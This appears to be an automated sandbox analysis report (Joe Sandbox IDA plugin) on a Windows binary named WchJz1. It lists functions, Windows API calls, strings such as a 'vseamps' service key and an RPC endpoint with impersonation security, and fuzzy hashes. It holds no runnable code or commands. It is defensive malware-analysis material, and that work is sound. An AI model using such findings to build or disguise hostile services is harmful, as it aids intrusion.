Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction Fuzzy Hash: 0CD19062908B42CAEF289F6694407ED37A8FB457ACF142175DA8D57BA6CF3CE081C700

Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014000169E
HeapFree.KERNEL32 ref: 00000001400016B0
GetProcessHeap.KERNEL32 ref: 00000001400016C0
HeapFree.KERNEL32 ref: 00000001400016D2
GetProcessHeap.KERNEL32 ref: 00000001400016E2
HeapFree.KERNEL32 ref: 00000001400016F4
GetProcessHeap.KERNEL32 ref: 0000000140001704
HeapFree.KERNEL32 ref: 0000000140001716
GetProcessHeap.KERNEL32 ref: 0000000140001726
HeapFree.KERNEL32 ref: 0000000140001738

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601

Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014001371E
HeapFree.KERNEL32 ref: 0000000140013730
GetProcessHeap.KERNEL32 ref: 0000000140013740
HeapFree.KERNEL32 ref: 0000000140013752
GetProcessHeap.KERNEL32 ref: 0000000140013762
HeapFree.KERNEL32 ref: 0000000140013774
GetProcessHeap.KERNEL32 ref: 0000000140013784
HeapFree.KERNEL32 ref: 0000000140013796
GetProcessHeap.KERNEL32 ref: 00000001400137A6
HeapFree.KERNEL32 ref: 00000001400137B8

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601

Function 00007FFE11BDB86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FFE11BDB9E8
GetProcAddress.KERNEL32 ref: 00007FFE11BDB9F4

Strings

api-ms-, xrefs: 00007FFE11BDB932
ext-ms-, xrefs: 00007FFE11BDB945

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction ID: 671bf9cb9682f61f157bbc544629e56795ce6490f556c72b068f6e69e75f8b05
Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction Fuzzy Hash: E641C125B1EE42D5EF398F17A9109BA2299BF0ABB4F486575DD0E477A4DE3CE4058300

Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 0000000140002A3C
RegQueryValueExW.ADVAPI32 ref: 0000000140002A76
RegCloseKey.ADVAPI32 ref: 0000000140002A96
EnterCriticalSection.KERNEL32 ref: 0000000140002AAB
LeaveCriticalSection.KERNEL32 ref: 0000000140002B31

Strings

SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002A0D
action, xrefs: 0000000140002A52

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 1119674940-1966266597
Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00

Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004BE7
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004BF6
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C04
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C3E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C4D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C5B
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C8E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C9D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004CAB

GetComputerNameW.KERNEL32 ref: 0000000140001991
lstrlenW.KERNEL32 ref: 000000014000199C
GetProcessHeap.KERNEL32 ref: 00000001400019AB
HeapAlloc.KERNEL32 ref: 00000001400019B9

Strings

ampIfEp, xrefs: 000000014000195E
ncalrpc, xrefs: 000000014000196D
Security=impersonation static true, xrefs: 0000000140001952

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen$ComputerName
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3702919091-996641649
Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00

Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700

Function 00007FFE11BD712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFE11BD72EB,?,?,?,00007FFE11BD3EC0,?,?,?,?,00007FFE11BD3CFD), ref: 00007FFE11BD71B1
GetLastError.KERNEL32(?,?,?,00007FFE11BD72EB,?,?,?,00007FFE11BD3EC0,?,?,?,?,00007FFE11BD3CFD), ref: 00007FFE11BD71BF
LoadLibraryExW.KERNEL32(?,?,?,00007FFE11BD72EB,?,?,?,00007FFE11BD3EC0,?,?,?,?,00007FFE11BD3CFD), ref: 00007FFE11BD71E9
FreeLibrary.KERNEL32(?,?,?,00007FFE11BD72EB,?,?,?,00007FFE11BD3EC0,?,?,?,?,00007FFE11BD3CFD), ref: 00007FFE11BD7257
GetProcAddress.KERNEL32(?,?,?,00007FFE11BD72EB,?,?,?,00007FFE11BD3EC0,?,?,?,?,00007FFE11BD3CFD), ref: 00007FFE11BD7263

Strings

api-ms-, xrefs: 00007FFE11BD71D1

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction ID: fba4d6f0aa21fed6e78adab1ef012ca17d1e01bf9bdd1d115fd6684937e1c030
Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction Fuzzy Hash: C431A321A1AEC1D5EF399F13A400DF9629CBF49BB8F591675ED1D067A0DE3CE4458300

Function 00007FFE11BD9444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE11BD9453
FlsGetValue.KERNEL32 ref: 00007FFE11BD9468
FlsSetValue.KERNEL32 ref: 00007FFE11BD9489
FlsSetValue.KERNEL32 ref: 00007FFE11BD94B6
FlsSetValue.KERNEL32 ref: 00007FFE11BD94C7
FlsSetValue.KERNEL32 ref: 00007FFE11BD94D8
SetLastError.KERNEL32 ref: 00007FFE11BD94F3

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction ID: 146d646e256ec906552e02e4fe3c9163292683f91fa8d5dbdb6de352d6dbfe33
Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction Fuzzy Hash: 2C217C20A0DE42C5FF7DAF2756519B9214A9F447B8F0027B4E93E06AF7FE2CA4418601

Function 00007FFE11BE0100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFE11BE0131
GetLastError.KERNEL32 ref: 00007FFE11BE013D
CloseHandle.KERNEL32 ref: 00007FFE11BE0155
CreateFileW.KERNEL32 ref: 00007FFE11BE0180
WriteConsoleW.KERNEL32 ref: 00007FFE11BE019F

Strings

CONOUT$, xrefs: 00007FFE11BE0161

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction ID: d6ef5f2de430f2acdffa45ad8b0958981baeaa1e57e443fcc909e91e00d69cf8
Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction Fuzzy Hash: F511BE22B1DE41C6E7608F57E844B2976A8FB88BF4F0012B4EA5D87BA4DF7CD9048740

Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
CreateEventW.KERNEL32 ref: 00000001400012C0

Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3

SetServiceStatus.ADVAPI32 ref: 0000000140001302
WaitForSingleObject.KERNEL32 ref: 0000000140001312

Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

SetServiceStatus.ADVAPI32 ref: 000000014000134B

Strings

vseamps, xrefs: 000000014000127B

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
String ID: vseamps
API String ID: 3197017603-3944098904
Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00

Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON

Download Yara Rule

APIs

sprintf_s.LIBCMTD ref: 0000000140001233
MessageBoxW.USER32 ref: 0000000140001249

Strings

Help, xrefs: 0000000140001238
Jul 5 2019, xrefs: 0000000140001216
usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy, xrefs: 000000014000121D
10:52:57, xrefs: 000000014000120F

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Messagesprintf_s
String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
API String ID: 2642950106-3610746849
Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700

Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000000140002666
HeapFree.KERNEL32 ref: 0000000140002674
GetProcessHeap.KERNEL32 ref: 0000000140002683
HeapFree.KERNEL32 ref: 0000000140002691
GetProcessHeap.KERNEL32 ref: 00000001400026A0
HeapFree.KERNEL32 ref: 00000001400026AE
GetProcessHeap.KERNEL32 ref: 00000001400026BD
HeapFree.KERNEL32 ref: 00000001400026CB

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700

Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002986
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002994
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029A3
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029B1
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029C0
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029CE
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029DD
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029EB

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200

Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300

